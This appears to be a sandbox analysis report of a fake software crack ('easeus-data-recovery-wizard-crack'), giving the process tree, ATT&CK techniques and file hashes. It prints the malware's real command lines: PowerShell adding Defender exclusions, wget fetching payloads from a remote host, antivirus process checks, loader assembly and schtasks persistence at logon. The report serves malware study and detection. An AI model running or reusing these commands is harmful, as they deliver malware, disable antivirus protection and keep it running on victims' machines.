PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80
PID 2604 wrote to memory of 3048	2604	msedge.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2104
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://nvr5q.gotra.top/55/s6RZ8
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe34b63cb8,0x7ffe34b63cc8,0x7ffe34b63cd8
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
  2⤵
  PID:768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,1510036641051886249,9858128315754120370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2796

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\easeus-data-recovery-wizard-crack\" -spe -an -ai#7zMap804:128:7zEvent17031
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:2072
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  PID:1544

C:\Users\Admin\Desktop\easeus-data-recovery-wizard-crack\Launcher.exe
"C:\Users\Admin\Desktop\easeus-data-recovery-wizard-crack\Launcher.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:984
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true; function Get-Win { while ($true) { if ($AdminRightsRequired) { try { Start-Process -FilePath 'C:\Users\Admin\Desktop\easeus-data-recovery-wizard-crack\Launcher.exe' -Verb RunAs -Wait; break } catch { Write-Host 'Error 0xc0000906' } } else { break } } }; Get-Win"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- - C:\Users\Admin\Desktop\easeus-data-recovery-wizard-crack\Launcher.exe
    "C:\Users\Admin\Desktop\easeus-data-recovery-wizard-crack\Launcher.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:USERPROFILE, $env:ProgramData, $env:SystemDrive\\"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\wget.exe
      "C:\Users\Admin\AppData\Local\Temp\wget.exe" --no-check-certificate --no-hsts https://81887.wabemquesturge.com/3 -O C:\Users\Admin\AppData\Local\Temp\0199031
      4⤵
      Executes dropped EXE
      PID:2844
  - - C:\Users\Admin\AppData\Local\Temp\winrar.exe
      "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\01*.* C:\Users\Admin\AppData\Local\Temp
      4⤵
      Executes dropped EXE
      PID:3868
  - - C:\Users\Admin\AppData\Local\Temp\wget.exe
      "C:\Users\Admin\AppData\Local\Temp\wget.exe" --no-check-certificate --no-hsts https://68192.wabemquesturge.com/4 -O C:\Users\Admin\AppData\Local\Temp\0259173
      4⤵
      Executes dropped EXE
      PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\winrar.exe
      "C:\Users\Admin\AppData\Local\Temp\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Local\Temp\02*.* C:\Users\Admin\AppData\Local\Temp
      4⤵
      Executes dropped EXE
      PID:1392

C:\Users\Admin\AppData\Local\Temp\11088582
C:\Users\Admin\AppData\Local\Temp\11088582
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:844

C:\Users\Admin\AppData\Local\Temp\22040691
C:\Users\Admin\AppData\Local\Temp\22040691
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy Monitored Monitored.cmd && Monitored.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5032
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3508
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "wrsa opssvc"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3272
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 751505
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5008
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "EntriesLiftTonerViiCoxDriverGraphsRepublic" Town
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Offline + ..\Forgot + ..\Refused + ..\Inside + ..\Extreme + ..\Mason + ..\Session + ..\Ambient k
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2780
- - C:\Users\Admin\AppData\Local\Temp\751505\Ide.com
    Ide.com k
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1780
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /create /tn "EchoSphere" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EchoCraft Dynamics\EchoSphere.js'" /sc onlogon /F /RL HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:276
  - - C:\Users\Admin\AppData\Local\Temp\10000020101\8e173ef658.exe
      "C:\Users\Admin\AppData\Local\Temp\10000020101\8e173ef658.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:3296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Arkansas Arkansas.cmd && Arkansas.cmd
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4392
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1412
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5032
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 260766
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2808
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "SympathyLibertySightDefectsEndsParticularDrawingsPhysiology" Papua
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2864
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Christ + ..\Abraham + ..\Clicking + ..\Ibm + ..\Also + ..\Cambodia + ..\Belgium + ..\Xml + ..\Peterson + ..\Spot + ..\Carry I
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2360
      - C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        
        Officials.com I
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3068
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks.exe /create /tn "CryptoMindTechPro360X" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CryptoTechMind360 Elite Innovations Co\CryptoMindTechPro360X.js'" /sc onlogon /F /RL HIGHEST
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        
        C:\Users\Admin\AppData\Local\Temp\260766\Officials.com
        7⤵
        Executes dropped EXE
        
        PID:3368
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 15
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:356
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\10000030111\f36d2e1eac.dll, Main
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2812
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 460
        5⤵
        Program crash
        
        PID:4568
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 15
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2812 -ip 2812
1⤵
PID:1976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\CryptoTechMind360 Elite Innovations Co\CryptoMindTechPro360X.scr

Filesize
1.0MB

MD5
c63860691927d62432750013b5a20f5f

SHA1
03678170aadf6bab2ac2b742f5ea2fd1b11feca3

SHA256
69d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353

SHA512
3357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
9e466b4837d8431be725d6b9c1b4d9ef

SHA1
3f247b7c89985a41d839cad351cd0fc182fcb284

SHA256
2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d

SHA512
01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
960B

MD5
16846df493521e84fe47cd6b6451ec8f

SHA1
6d99eb017c5aec08d3a7e908bbd4a051ce250c02

SHA256
69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9

SHA512
aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

Download Submit
C:\Users\Admin\AppData\Local\EchoCraft Dynamics\EchoSphere.scr

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4c1a24fa898d2a98b540b20272c8e47b

SHA1
3218bff9ce95b52842fa1b8bd00be073177141ef

SHA256
bbcc378fcbf64580e7a48b4e7ca9be57fa0a1f2e747f488325685bdb18d73a95

SHA512
e61f196e7f1c9a5fe249abe9b11eea770fb2f4babc61f60b12c71f43e6fe9354cf14869daf46abc2c2655bce180252acd43c10562a2dcd31fa7d90d33253820e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f1d2c7fd2ca29bb77a5da2d1847fbb92

SHA1
840de2cf36c22ba10ac96f90890b6a12a56526c6

SHA256
58d0f80310f4a84f687c5ce0adaa982eb42fe4480510399fa2ae975d40bb8bc5

SHA512
ede1fafea2404f16948fe0b5ea5161ccee3ee6e40c55ff98c337eac981a6776b9c73dc030a5c59e4347aec91259f497539206e71949c33adcecbf2c846709e14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
cdcc09280b6181d6244584c0d81cae9c

SHA1
02e345451cffbc35d53056298ad71dab301c7f85

SHA256
3d7531ce12c203895001be8b268f1b17ca72d04bbd1072c39467adf64d529955

SHA512
b1612ceab3c2b2e444face7a748a009db03dd9ed07910e51ace243bfd5391ededccddf46e2385bc6efe5fc56a237634e87adefac1a22a4716de220934eba0298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
859B

MD5
a8998b973dfe17530fe4ac57dfa7d97d

SHA1
de0d84edb819ad3abe1c92f716f7e4cd19b74944

SHA256
dd9e1ef3862bb8674478cf250336c0d92a4a9134b9b8769bcf03d356cfb678a6

SHA512
6a12cbb414cb46c4a999cd3395eb9f48622384a56a43b215bee4aee74efb42093b5c984269ced69d2fbfb49a92773916b5dcfcc3c0212d6ac3a755d0d55d15e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
89b6e1ed64d4928ee892b6c13d97c61b

SHA1
d6c40784943bcc7d4224f0d07d5b7a6285ed39ff

SHA256
d46d1ab5f045d8a204c903c7dcca6241da8e2e940e96b0e65edaca3cd720b560

SHA512
8af5f6512b8574efe2fc222f699ab446623194c69dc09bb819aacdca4b0b1c1fa7cf4797f0672a6153e1b8a9f3122dbcdd021a8d23f66e860d9272d151ee0038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7b2847a72976447943fa90176dcdc1ee

SHA1
8fff68aeb7e277e579efc69dca906c4e09368c58

SHA256
63ba34ddb7a0640db2d2cd41b6adf1ef25dffd172f40d6e1565f8ae6eca07908

SHA512
7da4808374df343dd3af6a0e4a94b66ead55dcce7926a855fa4387756cb92f525e7377da3dec61ec3ae91bcff793777ece0fd1ad6cf26d28d7d4c3c1a29db1ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cbae5aa5949c127b139664ead8c56abd

SHA1
02df6356dfc5dab740abd6acac63a9cfd1194538

SHA256
3fc6c3103451be43ac96277160f237ebfa648a94e099d855405dc973f28d28b6

SHA512
a9d2d3703fe3f8950320cd6a6db69bf4f9803b106868acba009a216816cebe6c7f93a61a1c36085540ed179e44661a881073815a376a3a8822c927d0e441aea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b97020e6a760298399730d9844805838

SHA1
4202aef160cb74e6a06554c4ffa89fbbb9edd2ed

SHA256
e3afabc6e88d28926c71ea3590a23c83422c19b6fe6edc6ba6fa5a5c55397e09

SHA512
d6db2c42e8c9287c7fa43933ed7386facc6ac049a6d27a1f37727c9b237bb0aa00870dd3bfc3200b42066c1d5119ed69754cd235cce80e6b7a19177d4b16b147

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
0f1de892baeb97db09af1582b5b5fe2a

SHA1
af096cd60fa0ae5db57ea7e40274e4c155164acb

SHA256
16fab33385d2385a7ba6857d1b4e34530aab539e7d6a1a5895ab6f15a1c7f2fe

SHA512
d74751716c7eace2771666d45006af6b0fe64256cbbee7bc30f152650f4d4409fdec4e4495fdd18e9e45508a92ae6b25b7b0fda8378ac8fd34d0ffd8367b3541

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cdec7d4bf82ca314f15c7addb36f8d1f

SHA1
d5c708050273b2f9db347b3cf0aa3794769be2dd

SHA256
c7f7851d2c8be659e75c312900a931c3ea5b557e8826da7c541079aa3e99ea24

SHA512
d0341c36af049a284ee604a0060abef5a38743c433616501a84600df36b711f2e47440bfda1acaf282e6f349a4346566dfcb6d5e95f547770600fa6c86c7b874

Download Submit
C:\Users\Admin\AppData\Local\Temp\0199031

Filesize
2.7MB

MD5
3826c7434e60e6ec95625903d018e19c

SHA1
fb138abd3de1e6647744a79b928c3e8de4a47097

SHA256
0e673d7d58e01a7550cab9f68bd7b5b95e29ab399a767cae4b4df8f5f1f3fc75

SHA512
9754a01daec5fea36b8467b9d701b815c74ea2e22cbe8c1044df7c958e6ec6fa3deaa9cd841692f0cc38e9879e989b7b61ade398ba170b6527d62e07d3fad462

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000020101\8e173ef658.exe

Filesize
18.2MB

MD5
24eea361f79a57ab30bb7420ad2fa8d6

SHA1
01e856e85c6adcd0ceed8339367c297937076daa

SHA256
2a812bb67a1e7ca873d5ee03104a68751e73fa7f804e6c91e0677903e0f9d702

SHA512
abfbcbd9bf3fb72a8823cca8940fcf0334f49c4649ee8aacc6f581ce2e67ddd0ed914cac3332838575cb54f61179d4b721351cddf111c2272dc95df39beae405

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000020101\8e173ef658.exe

Filesize
9.1MB

MD5
a03b9045679e56c27b3d36d9b4fc4b57

SHA1
c7bd346d730bb9b1195ff1af3fe29b6bcd208743

SHA256
fab4c4d62c26e3c7fcc72cf00a1edc3e556522b3faa68abec4fd89d51d8bd8e0

SHA512
d2e0fb4be55aa47b6340d1a6e72ede6b8d4c7294aaa0ed48c49bc0e6b04ba0ce8679129ba3de51e89fd8bceb0b70a530f0faecc28e527d7177925fb9495f6ab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000030111\f36d2e1eac.dll

Filesize
13.5MB

MD5
fed03f906d2998bc7d6b3290a3e4abf9

SHA1
252b737a66d25c278ddcfe881a10ef14cd6a0516

SHA256
f7df4263d0766d58f530c0210e0f49d5cd7fd4800adb7028e33b539444085b91

SHA512
4c00397d4f10c7529429204f8b737574ccdf4d902deaac8294081e71e6733a869cba1a2673d6e84336c65814ca12678d684eece8f119891eab5b0ab0d56d5619

Download Submit
C:\Users\Admin\AppData\Local\Temp\11088582

Filesize
2.6MB

MD5
12d4ad83ac244f4be7b430b5423bd8db

SHA1
d37e53aa38a8f9e020459c9000d55d4e10ade6b9

SHA256
5b96f1ec0f8dfa076b4bb724430fbf535dc9f5e44d99715c5d5d30732f03ee4b

SHA512
c5a75eaa219b73d85605950720f8b822f29a7ee0cf26b60182661d307a9094512167b453feefa228a78d3e996fadcbd4ab691080b52952ec8c465b6c7d1a12e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Arkansas.cmd

Filesize
12KB

MD5
f5590e7fe3f4aee6bdab32fa4634ca8d

SHA1
1a3cab616fb4a4e1280d9b77074095f8e40bb821

SHA256
d33aaee0a826f7537cb46ea7c5985383f87cf5058f9d01b8ce5cbb06d67500aa

SHA512
23b6bf0a0333d318b712428a0f066bc5d8c9bec64e4fd439af0ee95d28244f7b9b31edc839a1f30d20f952087a41e26e20ca732961e16e4d3104756851c719c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Monitored.cmd

Filesize
11KB

MD5
61011fc5fae366b011ddb998475fab7f

SHA1
0280cb2d053d39d8de66c96c9cfbc364cd9c05f2

SHA256
8b855282900df2da13af10daa8ab0d484cebbbe47223f636cdef8d1b88cd3eb8

SHA512
5e1884587316a5dcadc351f989c703d1fd1341fdab8ab4b5d9f45c1213fca4f933739e7b7e4cbade3a6ad10195f53931e1d97942e82a5a9fd232f2cb6c11f78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yrh0flpe.kcy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
